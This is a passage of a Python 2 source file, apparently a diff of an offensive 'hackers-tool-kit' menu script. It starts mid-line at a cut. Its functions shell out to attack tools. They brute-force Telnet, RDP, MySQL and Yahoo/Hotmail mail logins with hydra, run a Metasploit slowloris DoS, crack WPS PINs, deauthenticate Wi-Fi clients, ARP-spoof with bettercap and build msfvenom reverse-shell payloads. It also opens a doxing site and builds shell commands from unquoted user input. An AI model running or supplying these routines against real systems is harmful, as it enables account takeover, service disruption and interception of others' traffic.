8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - 